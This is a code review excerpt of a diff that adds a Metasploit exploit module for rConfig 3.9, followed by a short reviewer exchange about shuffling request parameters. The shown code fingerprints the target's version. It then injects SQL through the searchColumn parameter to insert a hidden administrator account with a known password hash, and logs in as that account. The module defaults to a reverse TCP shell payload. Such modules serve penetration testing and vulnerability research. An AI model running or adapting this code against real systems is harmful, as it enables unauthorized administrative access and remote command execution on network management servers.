modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb

```diff
@@ -0,0 +1,197 @@
+                      'DefaultOptions'  => {
+                        'RPORT' => 443,
+                        'SSL'     => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects
+                        'PAYLOAD' => 'generic/shell_reverse_tcp'
+                      },
+                      'DefaultTarget' => 0))
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])
+    ]
+  end
+
+  # CHECK IF RCONFIG IS REACHABLE AND INSTALLED
+  def check
+    vprint_status 'STEP 0: Get rConfig version...'
+    res = send_request_cgi!(
+      'method' => 'GET',
+      'uri' => '/login.php'
+    )
+    if !res || !res.get_html_document
+      fail_with(Failure::Unknown, 'Could not check rConfig version')
+    end
+    if res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig Version 3.9'
+      print_status('rConfig version 3.9 detected')
+      return Exploit::CheckCode::Appears
+    elsif res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig'
+      print_status('rConfig detected, but not version 3.9')
+      return Exploit::CheckCode::Detected
+    end
+  end
+
+  # CREATE AN ADMIN USER IN RCONFIG
+  def create_rconfig_user(user, _password)
+    vprint_status 'STEP 1 : Adding a temporary admin user...'
+    fake_id = Rex::Text.rand_text_numeric(3)
+    fake_pass = Rex::Text.rand_text_alpha(10)
+    fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'
+    fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'
+    userleveladmin = 9 # Administrator
+    user_sqli = "command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--"
+    sqli_res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'search' => 'search',
+        'searchOption' => 'contains',
+        'searchField'  => 'vuln',
+        'searchColumn' => user_sqli
+      }
+    )
+    unless sqli_res
+      print_warning('Failed to create user: Connection failed.')
+      return
+    end
+    print_good "New temporary user #{user} created"
+  end
+
+  # AUTHENTICATE ON RCONFIG
+  def login(user, pass)
+    vprint_status "STEP 2: Authenticating as #{user} ..."
+    # get session cookie (PHPSESSID)
+    res = send_request_cgi!(
+      'method' => 'GET',
+      'uri' => '/login.php'
+    )
+    @cookie = res.get_cookies
+    if @cookie.empty?
+      fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'
+      return
+    end
+    # authenticate
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
```

Comment:
Shuffling here also can be done and every GET and Post request.

Reply:
The application will always send parameters in the same position, why shuffling ?